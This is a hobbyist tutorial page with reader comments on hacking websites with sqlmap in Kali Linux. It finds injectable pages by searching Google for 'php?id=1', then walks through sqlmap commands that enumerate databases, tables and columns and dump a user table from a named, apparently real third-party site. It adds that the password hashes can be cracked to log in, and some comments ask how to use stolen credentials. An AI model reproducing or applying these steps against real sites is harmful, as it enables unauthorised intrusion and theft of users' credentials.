Hacking Websites With Sqlmap and Kali Linux

134,631

32

12

So your on the point that you want to hack websites with Kali Linux? Well then your on the right place! Today I'm going to show you how to hack a site with sqlmap in Kali Linux.

Teacher Notes

Teachers! Did you use this instructable in your classroom?
Add a Teacher Note to share how you incorporated it into your lesson.

Step 1: Fire Up Kali Linux

I guess you know how to do this step :D

Step 2: Start a New Terminal

Start by opening a new terminal. We'll use this terminal later.

Step 3: Find a Vulnerable Website

Go to Google and search for: php?id=1. If you found a site that got that in their link put an ' after the 1. If it says that there's a problem with the sql syntax then the site is vulnerable.

Step 4: Using Sqlmap to Hack It

In your terminal type:

sqlmap -u http://www.angelvestgroup.com/info.php?id=1 --dbs

(http://www.angelvestgroup.com/info.php?id=1 is my vulnerable url)

Now it's going to load the databases...

If that's done you'll need to select a database by typing:

sqlmap -u http://www.angelvestgroup.com/info.php?id=1 -D angelvest_china --tables

(angelvest_china is the database I found)

Now it's going to load all the information that's in the database you've selected.

Now you'll need to select a table by typing:

sqlmap -u http://www.angelvestgroup.com/info.php?id=1 -D angelvest_china -T db_user --column

(db_user is the table I found)

Now you need to select a column by typing:

sqlmap -u http://www.angelvestgroup.com/info.php?id=1 -D angelvest_china -T db_user -C username --dump

(username is the name of the column that I found)

Now it will dump the information in the column username and: you've hacked it! (On that site there is a column called passwords too so you just need to decrypt the hashes in that column and boom! You can login.)

Congrats! You've just hacked a website with sqlmap! If you liked the instructable you should take a look at my other instructables too! Stay tuned for more!

Share

    Recommendations

    • Indoor Lighting Contest

      Indoor Lighting Contest
    • Make It Fly Challenge

      Make It Fly Challenge
    • Growing Beyond Earth Maker Contest

      Growing Beyond Earth Maker Contest

    12 Discussions

    0
    None
    VishalV73

    Question 8 months ago

    if i found someone's username and password, then how will i use it to login???

    0
    None
    ShaheenP1

    Question 1 year ago on Step 3

    this is confusion , please explain well

    0
    None
    arslanahmad

    2 years ago

    [18:26:54] [CRITICAL] host 'www.linkedin.com' does not exist

    how i can handle this problum..

    while i heacking a wabsite

    1 reply
    0
    None
    Mohsen86on

    2 years ago

    Hi, can you reach me at soheil.singh86@gmail.com as i have some trade to share.

    1 reply
    0
    None
    amaharajan

    3 years ago

    great job bro!!!

    0
    None
    s-elroy-jetson

    3 years ago

    A great intro to SQL injection. Be safe, kids! Learn to make yourself as invisible as possible before attempting any hacks, and have the admin's permission as well.